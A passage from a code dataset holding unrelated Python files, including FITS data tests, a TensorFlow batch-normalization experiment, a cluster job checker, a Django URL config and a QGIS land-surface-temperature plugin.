{}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_remove_a_keyword_from_phu(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n if ad.instrument().upper() not in ['GNIRS', 'NIRI', 'F2']:\n del ad.phu['DETECTOR']\n assert 'DETECTOR' not in ad.phu, \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_writes_to_new_fits(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n test_file_location = os.path.join(path_to_inputs, 'temp.fits')\n\n if os.path.exists(test_file_location):\n os.remove(test_file_location)\n\n ad.write(test_file_location)\n assert os.path.exists(test_file_location)\n\n os.remove(test_file_location)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_can_overwrite_existing_file(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n test_file_location = os.path.join(path_to_inputs, 'temp_overwrite.fits')\n\n if os.path.exists(test_file_location):\n os.remove(test_file_location)\n\n ad.write(test_file_location)\n\n assert os.path.exists(test_file_location)\n\n adnew = astrodata.open(test_file_location)\n adnew.write(overwrite=True)\n\n # erasing file for cleanup\n os.remove(test_file_location)\n\n\ndef test_can_make_and_write_ad_object(path_to_inputs):\n # Creates data and ad object\n phu = fits.PrimaryHDU()\n pixel_data = np.random.rand(100, 100)\n\n hdu = fits.ImageHDU()\n hdu.data = pixel_data\n\n ad = astrodata.create(phu)\n ad.append(hdu, name='SCI')\n\n # Write file and test it exists properly\n test_file_location = os.path.join(\n path_to_inputs, 'created_fits_file.fits')\n\n if os.path.exists(test_file_location):\n os.remove(test_file_location)\n ad.write(test_file_location)\n\n assert os.path.exists(test_file_location)\n # Opens file again and tests data is same as above\n\n adnew = astrodata.open(test_file_location)\n assert np.array_equal(adnew[0].data, pixel_data)\n os.remove(test_file_location)\n\n\ndef test_can_append_table_and_access_data():\n my_astropy_table = Table(list(np.random.rand(2, 100)),\n names=['col1', 'col2'])\n\n phu = fits.PrimaryHDU()\n ad = astrodata.create(phu)\n astrodata.add_header_to_table(my_astropy_table)\n\n ad.append(my_astropy_table, name='BOB')\n\n print(ad.info())\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_set_a_keyword_on_phu_deprecated(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n try:\n with pytest.raises(AssertionError):\n ad.phu.DETECTOR = 'FooBar'\n ad.phu.ARBTRARY = 'BarBaz'\n\n assert ad.phu.DETECTOR == 'FooBar'\n assert ad.phu.ARBTRARY == 'BarBaz'\n assert ad.phu['DETECTOR'] == 'FooBar'\n\n except KeyError as e:\n\n # Some instruments don't have DETECTOR as a keyword\n if e.args[0] == \"Keyword 'DETECTOR' not found.\":\n pass\n else:\n raise KeyError\n\n\n# Regression:\n# Make sure that references to associated\n# extension objects are copied across\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_do_arith_and_retain_features(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n ad[0].NEW_FEATURE = np.array([1, 2, 3, 4, 5])\n ad2 = ad * 5\n\n np.testing.assert_array_almost_equal(\n ad[0].NEW_FEATURE, ad2[0].NEW_FEATURE)\n\n\ndef test_update_filename():\n phu = fits.PrimaryHDU()\n ad = astrodata.create(phu)\n ad.filename = 'myfile.fits'\n\n # This will also set ORIGNAME='myfile.fits'\n ad.update_filename(suffix='_suffix1')\n assert ad.filename == 'myfile_suffix1.fits'\n\n ad.update_filename(suffix='_suffix2', strip=True)\n assert ad.filename == 'myfile_suffix2.fits'\n\n ad.update_filename(suffix='_suffix1', strip=False)\n assert ad.filename == 'myfile_suffix2_suffix1.fits'\n\n ad.filename = 'myfile.fits'\n ad.update_filename(prefix='prefix_', strip=True)\n assert ad.filename == 'prefix_myfile.fits'\n\n ad.update_filename(suffix='_suffix', strip=True)\n assert ad.filename == 'prefix_myfile_suffix.fits'\n\n ad.update_filename(prefix='', suffix='_suffix2', strip=True)\n assert ad.filename == 'myfile_suffix2.fits'\n\n # Now check that updates are based on existing filename\n # (so \"myfile\" shouldn't appear)\n ad.filename = 'file_suffix1.fits'\n ad.update_filename(suffix='_suffix2')\n assert ad.filename == 'file_suffix1_suffix2.fits'\n\n # A suffix shouldn't have an underscore, so should assume that\n # \"file_suffix1\" is the root\n ad.update_filename(suffix='_suffix3', strip=True)\n assert ad.filename == 'file_suffix1_suffix3.fits'\n\n\n@pytest.mark.remote_data\ndef test_read_a_keyword_from_phu_deprecated():\n \"Test deprecated methods to access headers\"\n ad = astrodata.open(\n download_from_archive('N20110826S0336.fits', path='GMOS'))\n\n with pytest.raises(AttributeError):\n assert ad.phu.DETECTOR == 'GMOS + Red1'\n\n with pytest.raises(AttributeError):\n assert ad.hdr.CCDNAME == [\n 'EEV 9273-16-03', 'EEV 9273-20-04', 'EEV 9273-20-03'\n ]\n\n # and when accessing missing extension\n with pytest.raises(AttributeError):\n ad.ABC\n\n\nif __name__ == '__main__':\n pytest.main()\n","sub_path":"astrodata/tests/test_fits.py","file_name":"test_fits.py","file_ext":"py","file_size_in_byte":11723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565579626","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport sys\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"../MNIST_data\", one_hot=True)\n\nif len(sys.argv) != 2:\n print(\"USAGE : \",sys.argv[0],\" [seed number]\")\n sys.exit()\n\n\nmy_seed = int(sys.argv[1])\nfolder_name = sys.argv[1]\n\n\nnp.random.seed(my_seed)\n\n\nif not os.path.exists('BN_' + folder_name):\n os.makedirs('BN_' + folder_name)\n\n\nmini_batch_size = 64\nmax_iteration = 5000\nlearning_rate = 0.0001 \n\nepsilon = 1e-8\n\n\nX = tf.placeholder(tf.float32, shape=[None, 784])\nT = tf.placeholder(tf.float32, shape=[None, 10])\n\nW1 = tf.Variable(tf.random_normal(shape = [784, 3072], mean = 0,stddev = 0.1,seed = my_seed))\n#b1 = tf.Variable(tf.random_normal(shape = [512], mean = 0,stddev = 0.1,seed = 2*my_seed))\nscale1 = tf.Variable(tf.ones([3072]))\nbeta1 = tf.Variable(tf.zeros([3072]))\n\nW2 = tf.Variable(tf.random_normal(shape = [3072, 3072], mean = 0,stddev = 0.1,seed = 3*my_seed))\n#b2 = tf.Variable(tf.random_normal(shape = [256], mean = 0,stddev = 0.1,seed = 4*my_seed))\nscale2 = tf.Variable(tf.ones([3072]))\nbeta2 = tf.Variable(tf.zeros([3072]))\n\nW3 = tf.Variable(tf.random_normal(shape = [3072, 10], mean = 0,stddev = 0.1,seed = 5*my_seed))\nb3 = tf.Variable(tf.random_normal(shape = [10], mean = 0,stddev = 0.1, seed = 6*my_seed))\n\n\nz2 = tf.matmul(X,W1)\n\nbatch_mean1, batch_var1 = tf.nn.moments(z2,[0])\n\nz2_hat = (z2 - batch_mean1)/tf.sqrt(batch_var1 + epsilon)\n\nBN2 = scale1*z2_hat + beta1 \n\n\na2 = tf.nn.relu(BN2)\n\n\nz3 = tf.matmul(a2,W2)\n\nbatch_mean2, batch_var2 = tf.nn.moments(z3,[0])\n\nz3_hat = (z3 - batch_mean2)/tf.sqrt(batch_var2 + epsilon)\n\nBN3 = scale2*z3_hat + beta2 \n\n\na3 = tf.nn.relu(BN3)\n\n\nz4 = tf.matmul(a3,W3) + b3\na4 = tf.nn.sigmoid(z4)\n\ny = a4\n\n\ncross_entropy = -tf.reduce_mean(T*tf.log(y + epsilon) +(1-T)*tf.log(1-y + epsilon ))\n\n\ntrain_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)\n\n\ncorrect_prediction = tf.equal(tf.arg_max(y,1),tf.arg_max(T,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\nsess = tf.Session(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True)))\nsess.run(tf.global_variables_initializer())\n\n\nmean1, mean2, mean3 = [], [], []\ntrain_error, train_accuracy = [], []\nvalidation_error, validation_accuracy = [],[]\n\ntest_input, test_label = mnist.test.next_batch(1000)\n\nfor i in range(max_iteration) :\n \n train_input, train_label = mnist.train.next_batch(mini_batch_size)\n\n res = sess.run([train_step,cross_entropy,accuracy],feed_dict = {X : train_input , T : train_label})\n train_error.append(res[1])\n train_accuracy.append(res[2])\n\n res2 = sess.run([cross_entropy,accuracy,BN2,BN3,z4],feed_dict = {X : test_input, T : test_label})\n validation_error.append(res2[0])\n validation_accuracy.append(res2[1])\n mean1.append(np.mean(res2[2],axis =0))\n mean2.append(np.mean(res2[3],axis =0))\n mean3.append(np.mean(res2[4],axis =0))\n if i % 100 == 0 :\n print(i, res[1], res[2], res2[0],res2[1])\n\n\n\n\nres3 = sess.run([W1,W2,W3])\n \nnp.savetxt(fname='BN_' + folder_name + '/train_error.txt',X=train_error,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/train_accuracy.txt',X=train_accuracy,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/validation_error.txt',X=validation_error,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/validation_accuracy.txt',X=validation_accuracy,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/mean1.txt',X=mean1,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/mean2.txt',X=mean2,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/mean3.txt',X=mean3,fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/W1.txt',X=res3[0],fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/W2.txt',X=res3[1],fmt=\"%f\")\nnp.savetxt(fname='BN_' + folder_name + '/W3.txt',X=res3[2],fmt=\"%f\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Batch_Normalization/batch_normalization_for_test.py","file_name":"batch_normalization_for_test.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"361700446","text":"from firm import Firm\nfrom firm_action import FirmAction\nfrom firm_labormarket_action import FirmLaborMarketAction\nfrom firm_goodmarket_action import FirmGoodMarketAction\n\nimport math\nimport random\n\n\ndef change(new_value, old_value):\n return (new_value - old_value) / old_value if old_value > 0 else 0\n\n\ndef check_margin(salary, workers, expected):\n return 1 - salary * workers / expected > 0.05 if expected > 0 else 0\n\n\nclass MosesFirm(Firm):\n def __init__(self, id):\n super().__init__(id)\n self.salary = 200\n self.plan = 50 * self.efficiency_coefficient\n\n self.salary_change = 0\n self.price_change = 0\n self.sold_change = 0\n self.workers_change = 0\n self.plan_change = 0\n self.sales_change = 0\n self.profit_change = 0\n\n self.prev_salary = self.salary\n self.prev_price = self.price\n self.prev_sold = self.sold\n self.prev_plan = self.plan\n self.prev_workers = len(self.workers)\n self.prev_sales = self.sales\n self.prev_profit = self.profit\n\n self.exp_sales = 0.1\n self.exp_sold = 0.1\n\n self.expected = 0\n\n def decide_salary(self, stats):\n self.sales_change = change(self.sales, self.prev_sales)\n self.sold_change = change(self.sold, self.prev_sold)\n\n self.prev_sold = self.sold\n self.prev_sales = self.sales\n\n self.exp_sales = 0.5 * self.sales_change + 0.5 * stats.expected_sales_growth\n self.exp_sold = 0.5 * self.sold_change + 0.5 * stats.expected_sold_growth\n\n self.expected = (1 + self.exp_sales) * self.sales\n self.plan = (1 + self.exp_sold) * self.sold\n\n self.expected = self.expected if self.expected >= 0 else 0\n\n self.plan = (self.plan - self.stock) // self.efficiency_coefficient * self.efficiency_coefficient\n self.plan = self.plan if self.plan >= 0 else 0\n\n self.price = self.expected / self.plan if self.plan > 0 and self.expected > 0 else self.price\n self.salary = 0.95 * self.price * self.efficiency_coefficient\n\n while not (\n check_margin(self.salary, self.plan // self.efficiency_coefficient, self.expected)) and self.expected != 0:\n if self.profit >= 0:\n self.salary *= 0.95\n else:\n self.plan = self.plan // self.efficiency_coefficient - 1\n self.price = self.expected / self.plan if self.plan > 0 and self.expected > 0 else self.price\n self.salary = 0.95 * self.price * self.efficiency_coefficient\n self.plan = self.plan if self.plan >= 0 else 0\n self.offer_count = math.floor(self.plan / self.efficiency_coefficient) - len(self.workers)\n while self.offer_count < 0:\n self.fire_worker(random.choice(list(self.workers)))\n self.offer_count += 1\n if self.salary == 0:\n for worker in self.workers:\n self.fire_worker(worker)\n return FirmLaborMarketAction(self.offer_count, self.salary, [])\n\n def decide_price(self, stats):\n return FirmGoodMarketAction(self.stock, self.price, 0)","sub_path":"moses_firm.py","file_name":"moses_firm.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152746099","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport glob\nfrom icecream import ic\n\n\ndef get_jobs(cycles):\n jobs = []\n for c in cycles:\n qid = c.split(\".\")[-1].replace(\"o\", \"\")\n jobs.append(qid)\n return jobs\n\ndef check_status(f, sign):\n with open(f, 'r') as fh:\n info = fh.read()\n if sign in info:\n return True\n else:\n return False\n\ndef testcmd(command):\n import subprocess\n ret = subprocess.run(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,encoding=\"utf-8\",timeout=1)\n if ret.returncode == 0:\n return True\n else:\n return False\n\n\ndef jobsrun(job):\n #user = os.system('whoami')\n command = 'qstat -j ' + str(job)\n result = testcmd(command)\n return result\n\n\ndef main():\n regx = sys.argv[1]\n sign = sys.argv[2]\n files = glob.glob(regx)\n\n for f in files:\n cycles = glob.glob(f + \".o*\")\n # not run yet\n if len(cycles) < 1:\n print(f\"perhaps {f} is not run\")\n os.system(f\"sel-qsub evo 5g 1 {f}\")\n else:\n jobs = get_jobs(cycles)\n running = []\n done = 0\n for j in jobs:\n stdout = f + \".o\" + j\n if check_status(stdout, sign): # job runs good and finished\n #print(f\"{f} is done by qid {j}\")\n done += 1\n else:\n # job is not done\n if jobsrun(j): # still running\n #print(f\"{f} is running by qid {j}\")\n running.append(j)\n else: # not running, and no good sign\n print(f\"{f} run failed in cycle {j}\")\n #os.system(\"rm {f}.e{j} {f}.o{j}\")\n\n if len(running) > 1:\n print(f\"BAD, shell {f} is running under multi jobs: {running}\")\n\n if len(running) == 0 and done == 0:\n print(f\"{f} run failed\")\n #os.system(\"qsub-sel evo 5g 1 {f}\")\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n sys.exit(f\"python3 {sys.argv[0]} regx|\\*.sh sign|done\")\n else:\n main()\n","sub_path":"Pyscript/qsub/checkJobRun.py","file_name":"checkJobRun.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633716315","text":"# Copyright (c) Jupyter Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nimport unittest\nimport shutil\nimport os\nimport tempfile\nimport dashboards_bundlers.local_deploy as converter\nfrom os.path import join as pjoin\nfrom os.path import isdir, isfile, exists\nfrom jupyter_core.paths import jupyter_data_dir\n\n# Mock existence of declarative widgets\nDECL_WIDGETS_DIR = pjoin(jupyter_data_dir(), 'nbextensions/urth_widgets/')\nDECL_WIDGETS_JS_DIR = pjoin(DECL_WIDGETS_DIR, 'js')\nDECL_VIZ_DIR = pjoin(DECL_WIDGETS_DIR, 'components/urth-viz')\nDECL_CORE_DIR = pjoin(DECL_WIDGETS_DIR, 'components/urth-core')\nBOWER_COMPONENT_DIR = pjoin(jupyter_data_dir(), 'nbextensions/urth_widgets/urth_components/component-a')\n\nclass MockHandler(object):\n def __init__(self, notebook_dir):\n self.notebook_dir = notebook_dir\n self.settings = {\n 'base_url' : '/'\n }\n self.last_redirect = None\n self.tools = None\n\n def redirect(self, location):\n self.last_redirect = location\n\nclass TestLocalDeploy(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n os.makedirs(DECL_WIDGETS_JS_DIR)\n os.makedirs(DECL_CORE_DIR)\n os.makedirs(DECL_VIZ_DIR)\n os.makedirs(BOWER_COMPONENT_DIR)\n\n def setUp(self):\n self.tmp = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.tmp, ignore_errors=True)\n\n def test_bundle(self):\n '''Should bundle and redirect to the application output dzirectory.'''\n handler = MockHandler(self.tmp)\n converter.bundle(handler, 'test/resources/no_imports.ipynb')\n\n output_dir = pjoin(self.tmp, 'local_dashboards', 'no_imports')\n self.assertTrue(isdir(output_dir), 'app directory should exist')\n self.assertEqual(handler.last_redirect, '/files/local_dashboards/no_imports/index.html',\n 'redirect to application url')\n\n def test_bundle_index(self):\n '''Should write a valid index.html.'''\n converter.bundle_index(self.tmp, 'test/resources/no_imports.ipynb')\n self.assertTrue(isfile(pjoin(self.tmp, 'index.html')), 'index.html should exist')\n with open(pjoin(self.tmp, 'index.html')) as f:\n contents = f.read()\n self.assertIn('DOCTYPE', contents, 'should declare a DOCTYPE')\n self.assertIn('data-main=\"./static/main.js', contents, 'should load main.js script')\n self.assertIn(\"origin = window.location.origin\", contents, 'should use local notebook server for kernels')\n self.assertIn(\"tmpnb_mode = false\", contents, 'should not use tmpnb spawn API')\n self.assertIn(\"kernel_name = 'python3'\", contents, 'should use correct kernel')\n\n def test_bundle_web_static(self):\n '''Should write a static directory.'''\n converter.bundle_web_static(self.tmp)\n # Check path from converter\n self.assertTrue(isdir(pjoin(self.tmp, 'static', 'bower_components')), 'bower_components should exist')\n # Check file from converter\n self.assertTrue(isfile(pjoin(self.tmp, 'static', 'main.js')), 'main.js should exist')\n # Check path from extension source\n self.assertTrue(isdir(pjoin(self.tmp, 'static', 'dashboard-common')), 'dashboard-common should exist')\n\n def test_bundle_declarative_widgets(self):\n '''Should write declarative widgets to output.'''\n converter.bundle_declarative_widgets(self.tmp, 'test/resources/env.ipynb')\n self.assertTrue(exists(pjoin(self.tmp, 'static/urth_widgets')), 'urth_widgets should exist')\n self.assertTrue(exists(pjoin(self.tmp, 'static/urth_components')), 'urth_components should exist')\n\n def test_skip_declarative_widgets(self):\n '''Should not write declarative widgets to output.'''\n # Testing to make sure we do not add bower components if we do not need to\n converter.bundle_declarative_widgets(self.tmp, 'test/resources/no_imports.ipynb')\n self.assertFalse(exists(pjoin(self.tmp, 'static/urth_widgets')), 'urth_widgets should not exist')\n self.assertFalse(exists(pjoin(self.tmp, 'static/urth_components')), 'urth_components should not exist')\n","sub_path":"test/test_local_deploy.py","file_name":"test_local_deploy.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83855622","text":"# create a class and __init__\n\nclass Book():\n pass\n\nbook = Book()\nprint(book) # we get <__main__.Book object at 0x7fe3b9636a60>\n\n# When we say Book() we are instantiating a new object\n# This object iws assigned to the book variable\n# Printing it gives us the type and memory location\n\n# second method:\nprint(type(book)) # we get \n\n# Then...\nclass Book():\n def __init__(self, title):\n self.title = title\n \n# consider this the constructor, or the function that is invoked when we create a book.\n# self refers to the book being created \n# and we don't have to worry about passing that, it's implicit...\n# Title is passed in as an argument, and assigned to self.title (the title of the book)\n \n# methods\nclass Book():\n def __init__ (self, title, pages):\n self.title = title\n self.pages = pages\n \n def log(self):\n print(f\"{self.title} is {self.pages} pages long.\")\n \n def is_short(self):\n if self.pages < 100:\n return True\n \nbook = Book(\"are you my mother\", 72)\nbook.log()\n\n# prints out: are you my mother is 72 pages long.\n\n# class level variables\n\n# self refers to the object things are being invoked on,\n# When we create an object. __init__ assigns stuff to self\n# That allows each object to have attributes.\n\nclass Book():\n favs = [] # class\n \n def __init__ (self, title, pages):\n self.title = title\n self.pages = pages\n \n def log(self):\n print(f\"{self.title} is {self.pages} pages long.\")\n \n def is_short(self):\n if self.pages < 100:\n return True\n \nbook = Book(\"are you my mother?\", 72) # title and number of pages\nbook2 = Book(\"The Digging-est Dog\", 72)\n\nBook.favs.append(book) # add books to the list\nBook.favs.append(book2)\n\nprint(Book.favs)\n\n#To save save space we are combing the code for all three of these sections.\n\nclass Book():\n favs = [] # class\n\n def __init__(self, title, pages):\n self.title = title\n self.pages = pages\n\n def is_short(self):\n if self.pages < 100:\n return true\n\n #What happens when you pass object to print?\n def __str__(self):\n return f\"{self.title}, {self.pages} pages long\"\n\n #What happens when you use ==?\n def __eq__(self, other):\n if(self.title == other.title and self.pages == other.pages):\n return True\n\n #It's approriate to give something for __hash__ when you override __eq__\n # #This is the recommended way if mutable (like it is here):\n __hash__ = None\n\n #If should immutable, you could do something like this.\n #This replaces __hash__ = None\n def __hash__(self):\n # xor with hash of attributes\n return hash(self.title) ^ hash(self.pages)\n #from Mastering Object-Oriented Python\n\n\nbook = Book(\"Are You My Mother\", 72)\nprint(book)\nequal_book = Book(\"Are You My Mother\", 72)\nprint(\"Are they considered equal?\", book == equal_book) # yep\nprint(\"Are they the same object?\", book is equal_book) # nope\nbook2 = Book(\"The Digging-est Dog\", 72)\n\nprint(hash(book), hash(book2))\n\nprint(\"old hash\", hash(book))\nbook.title = \"new\"\nprint(\"new hash\", hash(book)) # BAD!!!\n#Hashes shouldn't change\n","sub_path":"Caleb Curry/oopbasics.py","file_name":"oopbasics.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"5368726","text":"#! /usr/bin/python\n\nimport matplotlib\nmatplotlib.use('Qt4Agg')\nimport pylab\nimport numpy\nimport sys\nimport imp\n\n# Simulation results\n\npref = sys.argv[0].replace('draw_rad_prof.py','')\n\nrawd = numpy.loadtxt(pref+'x_prof_initial.txt')\nxr0 = rawd[:,0]\ndr0 = rawd[:,1]\npr0 = rawd[:,2]\nvr0 = rawd[:,3]\ncr0 = rawd[:,4]\ntime = numpy.loadtxt(pref+'time.txt')\n\nxs0 = numpy.sort(xr0)\nids0 = numpy.argsort(xr0)\nds0 = [dr0[i] for i in ids0]\nps0 = [pr0[i] for i in ids0]\nvs0 = [vr0[i] for i in ids0]\ncs0 = [cr0[i] for i in ids0]\n\nrawd = numpy.loadtxt(pref+'x_prof_final.txt')\nxr = rawd[:,0]\ndr = rawd[:,1]\npr = rawd[:,2]\nvr = rawd[:,3]\ncr = rawd[:,4]\n\nxs = numpy.sort(xr)\nids = numpy.argsort(xr)\nds = [dr[i] for i in ids]\nps = [pr[i] for i in ids]\nvs = [vr[i] for i in ids]\ncs = [cr[i] for i in ids]\n\n# Analytic results\nxa = [x+time*(c+v) for x,v,c in zip(xs0,vs0,cs0)]\n\n# Show data\npylab.subplot(311)\npylab.plot(xs,ds,xa,ds0,xs0,ds0)\npylab.xlabel('r')\npylab.ylabel('Density')\n\npylab.subplot(312)\npylab.plot(xs,ps,xa,ps0,xs0,ps0)\npylab.xlabel('r')\npylab.ylabel('Pressure')\n\npylab.subplot(313)\npylab.plot(xs,vs,xa,vs0,xs0,vs0)\npylab.xlabel('r')\npylab.ylabel('Velocity')\npylab.legend(('Numeric','Analytic','Initial'))\n\npylab.show()\n","sub_path":"tests/newtonian/two_dimensional/simple_waves/draw_rad_prof.py","file_name":"draw_rad_prof.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32804945","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom rest_framework_nested import routers\n\nfrom .views import IndexView\nfrom authentication.views import AccountViewSet, UserView\nfrom jobs.views import JobViewSet, UserJobPostsViewSet, FreshJobsView\n\n\nrouter = routers.SimpleRouter(trailing_slash=False)\nrouter.register(r'users', AccountViewSet)\nrouter.register(r'jobs', JobViewSet, 'Job')\n\naccounts_router = routers.NestedSimpleRouter(\n router, r'users', lookup='account', trailing_slash=False\n)\naccounts_router.register(r'jobs', UserJobPostsViewSet)\n\nurlpatterns = patterns('',\n url(r'^api/v1/jobs/fresh', FreshJobsView.as_view()),\n url(r'^api/v1/', include(router.urls)),\n url(r'^api/v1/', include(accounts_router.urls)),\n url(r'^api/v1/me', UserView.as_view()),\n\n url(r'^auth/', include('rest_framework_social_oauth2.urls')),\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url('^.*$', IndexView.as_view(), name='index'),\n)\n","sub_path":"dayjobs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"198836915","text":"from qgis.PyQt.QtGui import *\nfrom qgis.PyQt.QtWidgets import *\nfrom qgis.PyQt.QtCore import *\nfrom qgis.utils import iface\n\nfrom qgis.core import *\n\nimport time\nfrom qgis.gui import QgsMapCanvas\n\nfrom . import resources, form, procedures, fileio, canvasLayer\n\n## Main class: LSTplugin\n\n\nclass LSTplugin(object):\n\n \"\"\"Main plugin object\"\"\"\n\n def __init__(self, iface):\n\n \"\"\"\n Initialiser\n \"\"\"\n\n self.iface = iface\n\n def initGui(self):\n\n \"\"\"\n Called when loaded\n Adds plugin option to menus\n \"\"\"\n\n self.action = QAction(\n icon=QIcon(\":plugins/LST_Plugin/icon.png\"),\n text=\"LST plugin\",\n parent=self.iface.mainWindow(),\n )\n self.action.triggered.connect(self.run)\n\n self.iface.addToolBarIcon(self.action)\n self.iface.addPluginToMenu(\"LST Plugin\", self.action)\n\n def unload(self):\n\n \"\"\"\n Called when plugin is unloaded\n Removes option from interface\n \"\"\"\n\n self.iface.removePluginMenu(\"LST Plugin\", self.action)\n self.iface.removeToolBarIcon(self.action)\n\n def run(self):\n\n \"\"\"\n Called when plugin asked to run\n Starts a UI instance, defined in form.py\n \"\"\"\n\n window = form.MainWindow(self.iface)\n window.show()\n\n\ndef displayOnScreen(resultStates, filer):\n\n \"\"\"\n Display generated outputs as layers on the interface\n \"\"\"\n\n resultNames = []\n for res in resultStates:\n resultNames.append(res[1])\n\n layers = dict()\n for i in range(6):\n if resultStates[i][0]:\n layers[resultNames[i]] = iface.addRasterLayer(\n filer.generateFileName(resultNames[i], \"TIF\"), resultNames[i]\n )\n return layers\n\nclass preprocess(QgsTask):\n\n def __init__(self, filePaths, resultStates, satType, parent):\n\n QgsTask.__init__(self, \"Inputs Processor\")\n\n self.filePaths = filePaths\n self.resultStates = resultStates\n self.satType = satType\n self.parent = parent\n\n self.bands = dict()\n self.filer = None\n self.error = None\n\n def run(self):\n\n \"\"\"\n Main processing element, called every time Go is pressed\n \"\"\"\n\n self.filer = fileio.fileHandler()\n self.parent.updateProgress(0, \"0 % Starting, setting optional out folder\")\n\n if(\"output\" in self.filePaths):\n self.filer.prepareOutFolder(self.filePaths[\"output\"])\n del self.filePaths[\"output\"]\n \n self.parent.updateProgress(5, \"5 % Loading files\")\n\n if \"zip\" in self.filePaths:\n self.bands = self.filer.loadZip(self.filePaths, self)\n self.satType = self.bands[\"sat_type\"]\n del self.bands[\"sat_type\"]\n else:\n self.bands = self.filer.loadBands(self.filePaths)\n \n self.parent.updateProgress(15, \"15% Files ready, checking for errors\")\n\n if self.bands[\"Error\"]:\n self.error = self.bands[\"Error\"]\n return True\n del self.bands[\"Error\"]\n return True\n \n def finished(self, results = None):\n\n if(not(results)):\n self.error = \"Aborted\"\n if(self.error):\n self.parent.setError(self.error)\n self.parent.updateProgress(20, \"20% Starting calculations\")\n\nclass postprocess(QgsTask):\n\n def __init__(self, proc_object, parent):\n\n QgsTask.__init__(self, \"Outputs Processor\")\n\n self.proc_object = proc_object\n self.parent = parent\n self.error = None\n \n def run(self):\n\n self.filer = self.proc_object.filer\n self.filer.saveAll(self.proc_object.results)\n self.parent.updateProgress(94, \"94% Files Saved\")\n return True\n\n def finished(self, results = None):\n\n if(not(results)):\n self.error = \"Aborted\"\n if(self.error):\n self.parent.setError(self.error)\n self.parent.done = True\n self.parent.updateProgress(95, \"95% Finished, Displaying Outputs\")\n\nclass CarrierTask(QgsTask):\n\n def __init__(self, form):\n QgsTask.__init__(self, \"LST plugin base task\")\n self.time = 0\n self.form = form\n self.error = None\n self.done = False\n self.notification = \"If you're still seeing this, something's gone very wrong\"\n \n def run(self):\n while(not(self.done) and not(self.error)):\n time.sleep(1)\n self.time = int(time.time() - self.form.start_time)\n self.setProgress(self.progress())\n return True\n \n def finished(self, result = None):\n\n self.setProgress(100)\n if(not(result)):\n self.error = \"Crash\"\n if(self.error):\n self.form.showError(self.error)\n self.form.endRun()\n \n def updateProgress(self, num, text):\n\n self.notification = text\n self.setProgress(num)\n \n def setError(self, msg):\n\n if(self.error):\n return\n self.error = msg\n self.done = True\n self.finished(True)\n","sub_path":"mainLST.py","file_name":"mainLST.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312214340","text":"from flask import Blueprint, render_template, redirect, url_for, make_response, abort\n\nimport mulli\n\nfrom . import forms\nfrom . import utils\n\nroot_page = Blueprint('root', __name__)\n\n\n@root_page.route('/', methods=('GET', 'POST'))\ndef index():\n form = forms.PasteForm()\n\n if form.validate_on_submit():\n try:\n paste_id = mulli.create_id(form.text.data)\n except ValueError:\n abort(500)\n\n try:\n utils.save_paste(paste_id, form.text.data)\n except 